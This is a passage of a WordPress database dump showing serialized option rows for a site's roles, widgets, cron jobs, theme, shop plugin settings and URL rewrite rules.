:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:10:"copy_posts";b:1;}}s:6:"author";a:2:{s:4:"name";s:6:"Author";s:12:"capabilities";a:10:{s:12:"upload_files";b:1;s:10:"edit_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:4:"read";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;s:22:"delete_published_posts";b:1;}}s:11:"contributor";a:2:{s:4:"name";s:11:"Contributor";s:12:"capabilities";a:5:{s:10:"edit_posts";b:1;s:4:"read";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;}}s:10:"subscriber";a:2:{s:4:"name";s:10:"Subscriber";s:12:"capabilities";a:2:{s:4:"read";b:1;s:7:"level_0";b:1;}}s:15:"css_js_designer";a:2:{s:4:"name";s:12:"Web Designer";s:12:"capabilities";a:46:{s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:4:"read";b:1;s:18:"read_private_pages";b:1;s:18:"read_private_posts";b:1;s:10:"edit_users";b:1;s:10:"edit_posts";b:1;s:10:"edit_pages";b:1;s:20:"edit_published_posts";b:1;s:20:"edit_published_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"edit_private_posts";b:1;s:17:"edit_others_posts";b:1;s:17:"edit_others_pages";b:1;s:13:"publish_posts";b:1;s:13:"publish_pages";b:1;s:12:"delete_posts";b:1;s:12:"delete_pages";b:1;s:20:"delete_private_pages";b:1;s:20:"delete_private_posts";b:1;s:22:"delete_published_pages";b:1;s:22:"delete_published_posts";b:1;s:19:"delete_others_posts";b:1;s:19:"delete_others_pages";b:1;s:17:"manage_categories";b:1;s:17:"moderate_comments";b:1;s:15:"unfiltered_html";b:1;s:12:"upload_files";b:1;s:15:"edit_custom_css";b:1;s:15:"read_custom_css";b:1;s:17:"delete_custom_css";b:1;s:16:"edit_custom_csss";b:1;s:23:"edit_others_custom_csss";b:1;s:19:"publish_custom_csss";b:1;s:18:"delete_custom_csss";b:1;s:28:"delete_published_custom_csss";b:1;s:25:"delete_others_custom_csss";b:1;s:26:"edit_published_custom_csss";b:1;}}}', 'yes'),
(93, 'widget_search', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(94, 'widget_recent-posts', 'a:2:{i:2;a:3:{s:5:"title";s:12:"Recent Posts";s:6:"number";i:5;s:9:"show_date";b:0;}s:12:"_multiwidget";i:1;}', 'yes'),
(95, 'widget_recent-comments', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(96, 'widget_archives', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(97, 'widget_meta', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(98, 'sidebars_widgets', 'a:5:{s:19:"wp_inactive_widgets";a:0:{}s:9:"sidebar-1";a:0:{}s:9:"sidebar-2";a:3:{i:0;s:10:"nav_menu-3";i:1;s:14:"recent-posts-2";i:2;s:10:"nav_menu-2";}s:9:"sidebar-3";a:0:{}s:13:"array_version";i:3;}', 'yes'),
(99, 'cron', 'a:5:{i:1525379384;a:3:{s:16:"wp_version_check";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:17:"wp_update_plugins";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}s:16:"wp_update_themes";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:10:"twicedaily";s:4:"args";a:0:{}s:8:"interval";i:43200;}}}i:1525382666;a:2:{s:16:"itsec_purge_logs";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}s:20:"itsec_purge_lockouts";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1525447485;a:1:{s:19:"wp_scheduled_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}i:1525449413;a:1:{s:30:"wp_scheduled_auto_draft_delete";a:1:{s:32:"40cd750bba9870f18aada2478b24840a";a:3:{s:8:"schedule";s:5:"daily";s:4:"args";a:0:{}s:8:"interval";i:86400;}}}s:7:"version";i:2;}', 'yes'),
(89549, 'itsec_jquery_version', '1.12.4', 'no'),
(108882, '_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9', '1525140763', 'no'),
(108883, '_transient_timeout_dash_v2_88ae138922fe95674369b1cb3d215a2b', '1525183963', 'no'),
(108884, '_transient_dash_v2_88ae138922fe95674369b1cb3d215a2b', '<div class="rss-widget"><ul><li><a class=''rsswidget'' href=''https://wordpress.org/news/2018/04/celebrate-the-wordpress-15th-anniversary-on-may-27/''>Celebrate the WordPress 15th Anniversary on May 27</a></li></ul></div><div class="rss-widget"><ul><li><a class=''rsswidget'' href=''https://ma.tt/2018/04/chinese-bikeshare-photos/''>Matt: Chinese Bikeshare Photos</a></li><li><a class=''rsswidget'' href=''https://ma.tt/2018/04/rent-a-family-in-japan/''>Matt: Rent-A-Family in Japan</a></li><li><a class=''rsswidget'' href=''https://poststatus.com/the-meta-episode-draft-podcast/''>Post Status: The meta episode — Draft podcast</a></li></ul></div>', 'no'),
(88595, 'can_compress_scripts', '1', 'no'),
(644, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:"auto_add";a:0:{}}', 'yes'),
(560, 're_db_version', '0.3.5.2', 'yes'),
(559, 're_product_category', 'a:19:{s:12:"catalog_view";s:4:"list";s:17:"grid_preview_size";s:3:"200";s:17:"list_preview_size";s:3:"176";s:18:"grid_vert_distance";s:2:"40";s:18:"list_vert_distance";s:2:"20";s:17:"grid_hor_distance";s:3:"100";s:13:"shadow_border";s:1:"1";s:16:"short_descr_size";s:1:"3";s:13:"hover_item_bg";s:7:"#ffffff";s:5:"title";s:1:"1";s:17:"short_descr_color";s:7:"#9D9D9D";s:5:"price";s:1:"1";s:11:"price_color";s:7:"#f58586";s:18:"image_border_color";s:7:"#e2e2e2";s:11:"title_color";s:7:"#6f6f6f";s:11:"short_descr";s:1:"1";s:13:"catalog_image";i:0;s:4:"more";i:0;s:11:"add_to_cart";i:0;}', 'yes'),
(771, 'userphoto_jpeg_compression', '90', 'yes'),
(772, 'userphoto_maximum_dimension', '150', 'yes'),
(773, 'userphoto_thumb_dimension', '80', 'yes'),
(774, 'userphoto_admin_notified', '0', 'yes'),
(775, 'userphoto_level_moderated', '2', 'yes'),
(776, 'userphoto_use_avatar_fallback', '1', 'yes'),
(777, 'userphoto_override_avatar', '1', 'yes'),
(388, 'wps_meta_settings', 'a:2:{s:13:"wps_theme_seo";s:3:"yes";s:18:"wps_login_register";s:1:"n";}', 'yes'),
(391, 'widget_wpssearchwidget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(396, 'vfb_db_version', '2.7', 'yes'),
(334, 'recently_activated', 'a:2:{s:47:"better-search-replace/better-search-replace.php";i:1524018341;s:45:"search-and-replace/inpsyde-search-replace.php";i:1524018341;}', 'yes'),
(11052, 'su_vote', 'no', 'yes'),
(338, 'vcita_schedulerinit', '', 'yes'),
(342, 'birs_staff_schedule_version', '1.1', 'yes'),
(343, 'birchschedule_options', 'a:3:{s:8:"currency";s:3:"USD";s:21:"default_calendar_view";s:10:"agendaWeek";s:7:"version";s:3:"1.1";}', 'yes'),
(127, 'current_theme', 'clearyourbeliefs', 'yes'),
(128, 'theme_mods_clearyourbeliefs', 'a:5:{i:0;b:0;s:18:"nav_menu_locations";a:2:{s:7:"primary";i:3;s:9:"secondary";i:0;}s:12:"header_image";s:77:"http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg1.jpg";s:17:"header_image_data";O:8:"stdClass":5:{s:13:"attachment_id";i:551;s:3:"url";s:77:"http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg1.jpg";s:13:"thumbnail_url";s:77:"http://beliefcloset.com/cyb/wp-content/uploads/2014/05/cropped-header-bg1.jpg";s:6:"height";i:240;s:5:"width";i:1260;}s:18:"custom_css_post_id";i:-1;}', 'yes'),
(129, 'theme_switched', '', 'yes'),
(364, 'wps_settings', 'a:6:{s:18:"wps_paypal_gateway";s:6:"Paypal";s:13:"wps_paypal_id";s:0:"";s:22:"wps_paypal_environment";s:45:"https://www.sandbox.paypal.com/cgi-bin/webscr";s:19:"wps_currency_symbol";s:1:"$";s:18:"wps_seller_country";s:3:"USD";s:14:"wps_return_url";s:0:"";}', 'yes'),
(1077, 'db_upgraded', '', 'yes'),
(392, '_transient_random_seed', '07c1e228aae9291e06f88d27d7c86673', 'yes'),
(397, 'vfb_dashboard_widget_options', 'a:1:{s:28:"vfb_dashboard_recent_entries";a:1:{s:5:"items";i:5;}}', 'yes'),
(517, 'tsa-calendar-data', 's:1:"1";', 'yes'),
(522, 'widget_tsa_widget', 'a:1:{s:12:"_multiwidget";i:1;}', 'yes'),
(540, 'toe_pages', '[{"page_id":170,"mod":"user","action":"getLoginForm","showFor":"guest","title":"Login"},{"page_id":171,"mod":"user","action":"getRegisterForm","showFor":"guest","title":"Registration"},{"page_id":172,"mod":"user","action":"getShoppingCart","showFor":"all","title":"Shopping Cart"},{"page_id":173,"mod":"checkout","action":"getAllHtml","showFor":"all","title":"Checkout"},{"page_id":174,"mod":"user","action":"getAccountSummaryHtml","showFor":"logged","title":"My Account"},{"page_id":175,"mod":"user","action":"getProfileHtml","showFor":"logged","title":"My Profile","parentTitle":"My Account"},{"page_id":176,"mod":"user","action":"getOrdersList","showFor":"logged","title":"My Orders","parentTitle":"My Account"},{"page_id":177,"mod":"digital_product","action":"getDownloadsList","showFor":"logged","title":"My Downloads","parentTitle":"My Account"},{"page_id":178,"mod":"user","action":"getPasswordRecoverConfirm","showFor":"guest","title":"Password Recovery Confirmation","hideFromMenu":true},{"page_id":179,"mod":"products","action":"getCategoriesListHtml","showFor":"all","title":"Categories"},{"page_id":180,"mod":"products","action":"getBrandsListHtml","showFor":"all","title":"Brands"},{"page_id":181,"mod":"products","action":"getAllProductsListHtml","showFor":"all","title":"All Products"}]', 'yes'),
(539, 'toe_checked_reg_plugs_time', '1524974197', 'yes'),
(590, 're_product_single', 'a:16:{s:5:"title";s:1:"1";s:10:"full_image";s:1:"1";s:11:"short_descr";s:1:"1";s:10:"full_descr";s:1:"1";s:16:"gallery_position";s:4:"left";s:7:"details";s:1:"1";s:5:"price";s:1:"1";s:17:"show_extra_fields";s:1:"1";s:12:"show_twitter";s:1:"1";s:10:"show_gplus";s:1:"1";s:16:"add_to_cart_text";s:7:"#ffffff";s:13:"show_facebook";s:1:"1";s:14:"preview_images";i:0;s:3:"sku";i:0;s:8:"quantity";i:0;s:11:"add_to_cart";i:0;}', 'yes'),
(543, 're_used', '1', 'yes'),
(561, 're_db_installed', '1', 'yes'),
(1241, 'hideDummyDataInstallNotice', '1', 'yes'),
(64791, 'products_categories_children', 'a:0:{}', 'yes'),
(3097, 'aff_duplicates', '', 'no'),
(652, 'products_brands_children', 'a:0:{}', 'yes'),
(22242, 'category_children', 'a:0:{}', 'yes'),
(997, 'auto_core_update_notified', 'a:4:{s:4:"type";s:7:"success";s:5:"email";s:30:"blesko@leskowebengineering.com";s:7:"version";s:5:"4.8.6";s:9:"timestamp";i:1522830641;}', 'no'),
(1912, 're_user_hided_send_stats', '1', 'yes'),
(32631, 'rewrite_rules', 'a:155:{s:11:"^wp-json/?$";s:22:"index.php?rest_route=/";s:14:"^wp-json/(.*)?";s:33:"index.php?rest_route=/$matches[1]";s:21:"^index.php/wp-json/?$";s:22:"index.php?rest_route=/";s:24:"^index.php/wp-json/(.*)?";s:33:"index.php?rest_route=/$matches[1]";s:16:"custom-css-js/?$";s:33:"index.php?post_type=custom-css-js";s:46:"custom-css-js/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_type=custom-css-js&feed=$matches[1]";s:41:"custom-css-js/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_type=custom-css-js&feed=$matches[1]";s:33:"custom-css-js/page/([0-9]{1,})/?$";s:51:"index.php?post_type=custom-css-js&paged=$matches[1]";s:47:"category/(.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?category_name=$matches[1]&feed=$matches[2]";s:42:"category/(.+?)/(feed|rdf|rss|rss2|atom)/?$";s:52:"index.php?category_name=$matches[1]&feed=$matches[2]";s:23:"category/(.+?)/embed/?$";s:46:"index.php?category_name=$matches[1]&embed=true";s:35:"category/(.+?)/page/?([0-9]{1,})/?$";s:53:"index.php?category_name=$matches[1]&paged=$matches[2]";s:17:"category/(.+?)/?$";s:35:"index.php?category_name=$matches[1]";s:44:"tag/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?tag=$matches[1]&feed=$matches[2]";s:39:"tag/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?tag=$matches[1]&feed=$matches[2]";s:20:"tag/([^/]+)/embed/?$";s:36:"index.php?tag=$matches[1]&embed=true";s:32:"tag/([^/]+)/page/?([0-9]{1,})/?$";s:43:"index.php?tag=$matches[1]&paged=$matches[2]";s:14:"tag/([^/]+)/?$";s:25:"index.php?tag=$matches[1]";s:45:"type/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_format=$matches[1]&feed=$matches[2]";s:40:"type/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?post_format=$matches[1]&feed=$matches[2]";s:21:"type/([^/]+)/embed/?$";s:44:"index.php?post_format=$matches[1]&embed=true";s:33:"type/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?post_format=$matches[1]&paged=$matches[2]";s:15:"type/([^/]+)/?$";s:33:"index.php?post_format=$matches[1]";s:41:"custom-css-js/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:51:"custom-css-js/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:71:"custom-css-js/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:66:"custom-css-js/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:66:"custom-css-js/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:47:"custom-css-js/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:30:"custom-css-js/([^/]+)/embed/?$";s:61:"index.php?post_type=custom-css-js&name=$matches[1]&embed=true";s:34:"custom-css-js/([^/]+)/trackback/?$";s:55:"index.php?post_type=custom-css-js&name=$matches[1]&tb=1";s:54:"custom-css-js/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:67:"index.php?post_type=custom-css-js&name=$matches[1]&feed=$matches[2]";s:49:"custom-css-js/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:67:"index.php?post_type=custom-css-js&name=$matches[1]&feed=$matches[2]";s:42:"custom-css-js/([^/]+)/page/?([0-9]{1,})/?$";s:68:"index.php?post_type=custom-css-js&name=$matches[1]&paged=$matches[2]";s:49:"custom-css-js/([^/]+)/comment-page-([0-9]{1,})/?$";s:68:"index.php?post_type=custom-css-js&name=$matches[1]&cpage=$matches[2]";s:38:"custom-css-js/([^/]+)(?:/([0-9]+))?/?$";s:67:"index.php?post_type=custom-css-js&name=$matches[1]&page=$matches[2]";s:30:"custom-css-js/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:40:"custom-css-js/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:60:"custom-css-js/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:55:"custom-css-js/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:55:"custom-css-js/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:36:"custom-css-js/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:40:"vc_grid_item/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:50:"vc_grid_item/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:70:"vc_grid_item/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:65:"vc_grid_item/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:65:"vc_grid_item/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:46:"vc_grid_item/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:29:"vc_grid_item/([^/]+)/embed/?$";s:45:"index.php?vc_grid_item=$matches[1]&embed=true";s:33:"vc_grid_item/([^/]+)/trackback/?$";s:39:"index.php?vc_grid_item=$matches[1]&tb=1";s:41:"vc_grid_item/([^/]+)/page/?([0-9]{1,})/?$";s:52:"index.php?vc_grid_item=$matches[1]&paged=$matches[2]";s:48:"vc_grid_item/([^/]+)/comment-page-([0-9]{1,})/?$";s:52:"index.php?vc_grid_item=$matches[1]&cpage=$matches[2]";s:37:"vc_grid_item/([^/]+)(?:/([0-9]+))?/?$";s:51:"index.php?vc_grid_item=$matches[1]&page=$matches[2]";s:29:"vc_grid_item/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:39:"vc_grid_item/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:59:"vc_grid_item/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:54:"vc_grid_item/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:54:"vc_grid_item/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:35:"vc_grid_item/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:35:"product/[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:45:"product/[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:65:"product/[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:60:"product/[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:60:"product/[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:41:"product/[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:24:"product/([^/]+)/embed/?$";s:40:"index.php?product=$matches[1]&embed=true";s:28:"product/([^/]+)/trackback/?$";s:34:"index.php?product=$matches[1]&tb=1";s:36:"product/([^/]+)/page/?([0-9]{1,})/?$";s:47:"index.php?product=$matches[1]&paged=$matches[2]";s:43:"product/([^/]+)/comment-page-([0-9]{1,})/?$";s:47:"index.php?product=$matches[1]&cpage=$matches[2]";s:32:"product/([^/]+)(?:/([0-9]+))?/?$";s:46:"index.php?product=$matches[1]&page=$matches[2]";s:24:"product/[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:34:"product/[^/]+/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:54:"product/[^/]+/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:49:"product/[^/]+/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:49:"product/[^/]+/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:30:"product/[^/]+/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:60:"products_categories/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:58:"index.php?products_categories=$matches[1]&feed=$matches[2]";s:55:"products_categories/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:58:"index.php?products_categories=$matches[1]&feed=$matches[2]";s:36:"products_categories/([^/]+)/embed/?$";s:52:"index.php?products_categories=$matches[1]&embed=true";s:48:"products_categories/([^/]+)/page/?([0-9]{1,})/?$";s:59:"index.php?products_categories=$matches[1]&paged=$matches[2]";s:30:"products_categories/([^/]+)/?$";s:41:"index.php?products_categories=$matches[1]";s:56:"products_brands/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:54:"index.php?products_brands=$matches[1]&feed=$matches[2]";s:51:"products_brands/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:54:"index.php?products_brands=$matches[1]&feed=$matches[2]";s:32:"products_brands/([^/]+)/embed/?$";s:48:"index.php?products_brands=$matches[1]&embed=true";s:44:"products_brands/([^/]+)/page/?([0-9]{1,})/?$";s:55:"index.php?products_brands=$matches[1]&paged=$matches[2]";s:26:"products_brands/([^/]+)/?$";s:37:"index.php?products_brands=$matches[1]";s:12:"robots\\.txt$";s:18:"index.php?robots=1";s:48:".*wp-(atom|rdf|rss|rss2|feed|commentsrss2)\\.php$";s:18:"index.php?feed=old";s:20:".*wp-app\\.php(/.*)?$";s:19:"index.php?error=403";s:18:".*wp-register.php$";s:23:"index.php?register=true";s:32:"feed/(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:27:"(feed|rdf|rss|rss2|atom)/?$";s:27:"index.php?&feed=$matches[1]";s:8:"embed/?$";s:21:"index.php?&embed=true";s:20:"page/?([0-9]{1,})/?$";s:28:"index.php?&paged=$matches[1]";s:27:"comment-page-([0-9]{1,})/?$";s:41:"index.php?&page_id=1941&cpage=$matches[1]";s:41:"comments/feed/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:36:"comments/(feed|rdf|rss|rss2|atom)/?$";s:42:"index.php?&feed=$matches[1]&withcomments=1";s:17:"comments/embed/?$";s:21:"index.php?&embed=true";s:44:"search/(.+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:39:"search/(.+)/(feed|rdf|rss|rss2|atom)/?$";s:40:"index.php?s=$matches[1]&feed=$matches[2]";s:20:"search/(.+)/embed/?$";s:34:"index.php?s=$matches[1]&embed=true";s:32:"search/(.+)/page/?([0-9]{1,})/?$";s:41:"index.php?s=$matches[1]&paged=$matches[2]";s:14:"search/(.+)/?$";s:23:"index.php?s=$matches[1]";s:47:"author/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:42:"author/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:50:"index.php?author_name=$matches[1]&feed=$matches[2]";s:23:"author/([^/]+)/embed/?$";s:44:"index.php?author_name=$matches[1]&embed=true";s:35:"author/([^/]+)/page/?([0-9]{1,})/?$";s:51:"index.php?author_name=$matches[1]&paged=$matches[2]";s:17:"author/([^/]+)/?$";s:33:"index.php?author_name=$matches[1]";s:69:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:64:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:80:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&feed=$matches[4]";s:45:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/embed/?$";s:74:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&embed=true";s:57:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:81:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]&paged=$matches[4]";s:39:"([0-9]{4})/([0-9]{1,2})/([0-9]{1,2})/?$";s:63:"index.php?year=$matches[1]&monthnum=$matches[2]&day=$matches[3]";s:56:"([0-9]{4})/([0-9]{1,2})/feed/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:51:"([0-9]{4})/([0-9]{1,2})/(feed|rdf|rss|rss2|atom)/?$";s:64:"index.php?year=$matches[1]&monthnum=$matches[2]&feed=$matches[3]";s:32:"([0-9]{4})/([0-9]{1,2})/embed/?$";s:58:"index.php?year=$matches[1]&monthnum=$matches[2]&embed=true";s:44:"([0-9]{4})/([0-9]{1,2})/page/?([0-9]{1,})/?$";s:65:"index.php?year=$matches[1]&monthnum=$matches[2]&paged=$matches[3]";s:26:"([0-9]{4})/([0-9]{1,2})/?$";s:47:"index.php?year=$matches[1]&monthnum=$matches[2]";s:43:"([0-9]{4})/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:38:"([0-9]{4})/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?year=$matches[1]&feed=$matches[2]";s:19:"([0-9]{4})/embed/?$";s:37:"index.php?year=$matches[1]&embed=true";s:31:"([0-9]{4})/page/?([0-9]{1,})/?$";s:44:"index.php?year=$matches[1]&paged=$matches[2]";s:13:"([0-9]{4})/?$";s:26:"index.php?year=$matches[1]";s:27:".?.+?/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:".?.+?/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:".?.+?/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:".?.+?/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:".?.+?/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"(.?.+?)/embed/?$";s:41:"index.php?pagename=$matches[1]&embed=true";s:20:"(.?.+?)/trackback/?$";s:35:"index.php?pagename=$matches[1]&tb=1";s:40:"(.?.+?)/feed/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:35:"(.?.+?)/(feed|rdf|rss|rss2|atom)/?$";s:47:"index.php?pagename=$matches[1]&feed=$matches[2]";s:28:"(.?.+?)/page/?([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&paged=$matches[2]";s:35:"(.?.+?)/comment-page-([0-9]{1,})/?$";s:48:"index.php?pagename=$matches[1]&cpage=$matches[2]";s:24:"(.?.+?)(?:/([0-9]+))?/?$";s:47:"index.php?pagename=$matches[1]&page=$matches[2]";s:27:"[^/]+/attachment/([^/]+)/?$";s:32:"index.php?attachment=$matches[1]";s:37:"[^/]+/attachment/([^/]+)/trackback/?$";s:37:"index.php?attachment=$matches[1]&tb=1";s:57:"[^/]+/attachment/([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:"[^/]+/attachment/([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:49:"index.php?attachment=$matches[1]&feed=$matches[2]";s:52:"[^/]+/attachment/([^/]+)/comment-page-([0-9]{1,})/?$";s:50:"index.php?attachment=$matches[1]&cpage=$matches[2]";s:33:"[^/]+/attachment/([^/]+)/embed/?$";s:43:"index.php?attachment=$matches[1]&embed=true";s:16:"([^/]+)/embed/?$";s:37:"index.php?name=$matches[1]&embed=true";s:20:"([^/]+)/trackback/?$";s:31:"index.php?name=$matches[1]&tb=1";s:40:"([^/]+)/feed/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?name=$matches[1]&feed=$matches[2]";s:35:"([^/]+)/(feed|rdf|rss|rss2|atom)/?$";s:43:"index.php?name=$matches[1]&feed=$matches[2]";s:28:"([^/]+)/page/?([0-9]{1,})/?$";s:44:"index.php?name=$matches[1]&paged=$matches[2]";s:35:"([^/]+)/comment-page-([0-9]{1,})/?$";s:44:"index.php?name=$matches[1]&cpage=$matches[2]";s:24:"([^/]+)(?:/([0-9]+))?/?$";s:43:"index.php?name=$matches[1]&page=$matches[2]";s:16:"[^/]+/([^/]+)/?$";s:32:"index.php?attachment=$mat